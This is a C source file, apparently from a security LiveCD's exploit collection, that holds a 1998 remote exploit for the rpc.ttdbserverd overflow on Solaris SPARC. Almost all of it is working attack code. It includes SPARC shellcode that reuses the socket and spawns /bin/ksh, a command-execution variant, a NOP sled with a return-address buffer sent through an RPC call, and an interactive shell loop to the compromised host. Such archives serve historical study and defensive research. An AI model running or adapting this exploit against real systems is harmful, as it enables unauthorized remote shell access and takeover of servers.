home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / rpc / lsd-solttdbserverd.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  9KB  |  227 lines

---

1. /*## copyright LAST STAGE OF DELIRIUM jul 1998 poland        *://lsd-pl.net/ #*/
2. /*## rpc.ttdbserverd                                                         #*/
3.  
4. #include <sys/types.h>
5. #include <sys/socket.h>
6. #include <netinet/in.h>
7. #include <rpc/rpc.h>
8. #include <netdb.h>
9. #include <stdio.h>
10. #include <errno.h>
11.  
12. int adrnum;
13. int nopnum;
14.  
15. #define TTDBSERVERD_PROG 100083
16. #define TTDBSERVERD_VERS 1
17. #define TTDBSERVERD_ISERASE 7
18.  
19. char findsckcode[]=
20.     "\x20\xbf\xff\xff"     /* bn,a    <findsckcode-4>      */
21.     "\x20\xbf\xff\xff"     /* bn,a    <findsckcode>        */
22.     "\x7f\xff\xff\xff"     /* call    <findsckcode+4>      */
23.     "\xa0\x20\x3f\xff"     /* sub     %g0,-1,%l0           */
24.     "\xa4\x03\xff\xd0"     /* add     %o7,-48,%l2          */
25.     "\xa6\x10\x20\x44"     /* mov     0x44,%l3             */
26.     "\xa8\x10\x23\xff"     /* mov     0x3ff,%l4            */
27.     "\xaa\x03\xe0\x44"     /* add     %o7,68,%l5           */
28.     "\x81\xc5\x60\x08"     /* jmp     %l5+8                */
29.  
30.     "\xaa\x10\x20\xff"     /* mov     0xff,%l5             */
31.     "\xab\x2d\x60\x08"     /* sll     %l5,8,%l5            */
32.     "\xaa\x15\x60\xff"     /* or      %l5,0xff,%l5         */
33.     "\xe2\x03\xff\xd0"     /* ld      [%o7-48],%l1         */
34.     "\xac\x0c\x40\x15"     /* and     %l1,%l5,%l6          */
35.     "\x2b\x00\x00\x00"     /* sethi   %hi(0x00000000),%l5  */
36.     "\xaa\x15\x60\x00"     /* or      %l5,0x000,%l5        */
37.     "\xac\x05\x40\x16"     /* add     %l5,%l6,%l6          */
38.     "\xac\x05\xbf\xff"     /* add     %l6,-1,%l6           */
39.     "\x80\xa5\xbf\xff"     /* cmp     %l6,-1               */
40.     "\x02\xbf\xff\xf5"     /* be      <findsckcode+32>     */
41.     "\xaa\x03\xe0\x7c"     /* add     %o7,0x7c,%l5         */
42.  
43.     "\xe6\x23\xff\xc4"     /* st      %l3,[%o7-60]         */
44.     "\xc0\x23\xff\xc8"     /* st      %g0,[%o7-56]         */
45.     "\xe4\x23\xff\xcc"     /* st      %l2,[%o7-52]         */
46.     "\x90\x04\x3f\xff"     /* add     %l0,-1,%o0           */
47.     "\xaa\x10\x20\x54"     /* mov     0x54,%l5             */
48.     "\xad\x2d\x60\x08"     /* sll     %l5,8,%l6            */
49.     "\x92\x15\xa0\x91"     /* or      %l6,0x91,%o1         */
50.     "\x94\x03\xff\xc4"     /* add     %o7,-60,%o2          */
51.     "\x82\x10\x20\x36"     /* mov     0x36,%g1             */
52.     "\x91\xd0\x20\x08"     /* ta      8                    */
53.     "\xa0\x24\x3f\xff"     /* sub     %l0,-1,%l0           */
54.     "\x1a\xbf\xff\xe9"     /* bcc     <findsckcode+36>     */
55.     "\x80\xa4\x23\xff"     /* cmp     %l0,0x3ff            */
56.     "\x04\xbf\xff\xf3"     /* bl      <findsckcode+84>     */
57.  
58.     "\xaa\x20\x3f\xff"     /* sub     %g0,-1,%l5           */
59.     "\x90\x05\x7f\xff"     /* add     %l5,-1,%o0           */
60.     "\x82\x10\x20\x06"     /* mov     0x6,%g1              */
61.     "\x91\xd0\x20\x08"     /* ta      8                    */
62.     "\x90\x04\x3f\xfe"     /* add     %l0,-2,%o0           */
63.     "\x82\x10\x20\x29"     /* mov     0x29,%g1             */
64.     "\x91\xd0\x20\x08"     /* ta      8                    */
65.     "\xaa\x25\x7f\xff"     /* sub     %l5,-1,%l5           */
66.     "\x80\xa5\x60\x03"     /* cmp     %l5,3                */
67.     "\x04\xbf\xff\xf8"     /* ble     <findsckcode+144>    */
68.     "\x80\x1c\x40\x11"     /* xor     %l1,%l1,%g0          */
69. ;
70.  
71. char shellcode[]=
72.     "\x20\xbf\xff\xff"     /* bn,a    <shellcode-4>        */
73.     "\x20\xbf\xff\xff"     /* bn,a    <shellcode>          */
74.     "\x7f\xff\xff\xff"     /* call    <shellcode+4>        */
75.     "\x90\x03\xe0\x20"     /* add     %o7,32,%o0           */
76.     "\x92\x02\x20\x10"     /* add     %o0,16,%o1           */
77.     "\xc0\x22\x20\x08"     /* st      %g0,[%o0+8]          */
78.     "\xd0\x22\x20\x10"     /* st      %o0,[%o0+16]         */
79.     "\xc0\x22\x20\x14"     /* st      %g0,[%o0+20]         */
80.     "\x82\x10\x20\x0b"     /* mov     0xb,%g1              */
81.     "\x91\xd0\x20\x08"     /* ta      8                    */
82.     "/bin/ksh"
83. ;
84.  
85. char cmdshellcode[]=
86.     "\x20\xbf\xff\xff"     /* bn,a    <cmdshellcode-4>     */
87.     "\x20\xbf\xff\xff"     /* bn,a    <cmdshellcode>       */
88.     "\x7f\xff\xff\xff"     /* call    <cmdshellcode+4>     */
89.     "\x90\x03\xe0\x34"     /* add     %o7,52,%o0           */
90.     "\x92\x23\xe0\x20"     /* sub     %o7,32,%o1           */
91.     "\xa2\x02\x20\x0c"     /* add     %o0,12,%l1           */
92.     "\xa4\x02\x20\x10"     /* add     %o0,16,%l2           */
93.     "\xc0\x2a\x20\x08"     /* stb     %g0,[%o0+8]          */
94.     "\xc0\x2a\x20\x0e"     /* stb     %g0,[%o0+14]         */
95.     "\xd0\x23\xff\xe0"     /* st      %o0,[%o7-32]         */
96.     "\xe2\x23\xff\xe4"     /* st      %l1,[%o7-28]         */
97.     "\xe4\x23\xff\xe8"     /* st      %l2,[%o7-24]         */
98.     "\xc0\x23\xff\xec"     /* st      %g0,[%o7-20]         */
99.     "\x82\x10\x20\x0b"     /* mov     0xb,%g1              */
100.     "\x91\xd0\x20\x08"     /* ta      8                    */
101.     "/bin/ksh    -c  "
102. ;
103.  
104. static char nop[]="\x80\x1c\x40\x11";
105.  
106. typedef struct{char *string;}req_t;
107.  
108. bool_t xdr_req(XDR *xdrs,req_t *obj){
109.     if(!xdr_string(xdrs,&obj->string,~0)) return(FALSE);
110.     return(TRUE);
111. }
112.  
113. main(int argc,char **argv){
114.     char buffer[30000],address[4],*b,*cmd;
115.     int i,c,n,flag=1,vers=0,port=0,sck;
116.     CLIENT *cl;enum clnt_stat stat;
117.     struct hostent *hp;
118.     struct sockaddr_in adr;
119.     struct timeval tm={10,0};
120.     req_t req;
121.  
122.     printf("copyright LAST STAGE OF DELIRIUM jul 1998 poland  //lsd-pl.net/\n");
123.     printf("rpc.ttdbserverd for solaris 2.3 2.4 2.5 2.5.1 2.6 sparc\n\n");
124.  
125.     if(argc<2){
126.         printf("usage: %s address [-s|-c command] [-p port] [-v 6]\n",argv[0]);
127.         exit(-1);
128.     }
129.  
130.     while((c=getopt(argc-1,&argv[1],"sc:p:v:"))!=-1){
131.         switch(c){
132.         case 's': flag=1;break;
133.         case 'c': flag=0;cmd=optarg;break;
134.         case 'p': port=atoi(optarg);break;
135.         case 'v': vers=atoi(optarg);
136.         }
137.     }
138.  
139.     if(vers==6){
140.         *(unsigned long*)address=htonl(0xeffff420+1200+552);
141.         adrnum=1200;
142.         nopnum=1300;
143.     }else{
144.         *(unsigned long*)address=htonl(0xefffdadc+1000+4500);
145.         adrnum=3000;
146.         nopnum=6000;
147.     }
148.  
149.     printf("adr=0x%08x timeout=%d ",ntohl(*(unsigned long*)address),tm.tv_sec);
150.     fflush(stdout);
151.  
152.     adr.sin_family=AF_INET;
153.     adr.sin_port=htons(port);
154.     if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
155.         if((hp=gethostbyname(argv[1]))==NULL){
156.             errno=EADDRNOTAVAIL;perror("error");exit(-1);
157.         }
158.         memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
159.     }
160.  
161.     sck=RPC_ANYSOCK;
162.     if(!(cl=clnttcp_create(&adr,TTDBSERVERD_PROG,TTDBSERVERD_VERS,&sck,0,0))){
163.         clnt_pcreateerror("error");exit(-1);
164.     }
165.     cl->cl_auth=authunix_create("localhost",0,0,0,NULL);
166.  
167.     b=buffer;
168.     for(i=0;i<adrnum;i++) *b++=address[i%4];
169.     for(i=0;i<nopnum;i++) *b++=nop[i%4];
170.     if(flag){
171.         i=sizeof(struct sockaddr_in);
172.         if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){
173.             struct{unsigned int maxlen;unsigned int len;char *buf;}nb;
174.             ioctl(sck,(('S'<<8)|2),"sockmod");
175.             nb.maxlen=0xffff;
176.             nb.len=sizeof(struct sockaddr_in);;
177.             nb.buf=(char*)&adr;
178.             ioctl(sck,(('T'<<8)|144),&nb);
179.         }
180.         n=-ntohs(adr.sin_port);
181.         printf("port=%d connected! ",-n);fflush(stdout);
182.  
183.         *((unsigned long*)(&findsckcode[56]))|=htonl((n>>10)&0x3fffff);
184.         *((unsigned long*)(&findsckcode[60]))|=htonl(n&0x3ff);
185.         for(i=0;i<strlen(findsckcode);i++) *b++=findsckcode[i];
186.         for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
187.     }else{
188.         for(i=0;i<strlen(cmdshellcode);i++) *b++=cmdshellcode[i];
189.         for(i=0;i<strlen(cmd);i++) *b++=cmd[i];
190.         *b++=';';
191.     }
192.     *b++=':';
193.     *b=0;
194.  
195.     req.string=buffer;
196.  
197.     stat=clnt_call(cl,TTDBSERVERD_ISERASE,xdr_req,&req,xdr_void,NULL,tm);
198.     if(stat==RPC_SUCCESS) {printf("\nerror: not vulnerable\n");exit(-1);}
199.     printf("sent!\n");if(!flag) exit(0);
200.  
201.     write(sck,"/bin/uname -a\n",14);
202.     while(1){
203.         fd_set fds;
204.         FD_ZERO(&fds);
205.         FD_SET(0,&fds);
206.         FD_SET(sck,&fds);
207.         if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
208.             int cnt;
209.             char buf[1024];
210.             if(FD_ISSET(0,&fds)){
211.                 if((cnt=read(0,buf,1024))<1){
212.                     if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
213.                     else break;
214.                 }
215.                 write(sck,buf,cnt);
216.             }
217.             if(FD_ISSET(sck,&fds)){
218.                 if((cnt=read(sck,buf,1024))<1){
219.                     if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
220.                     else break;
221.                 }
222.                 write(1,buf,cnt);
223.             }
224.         }
225.     }
226. }
227.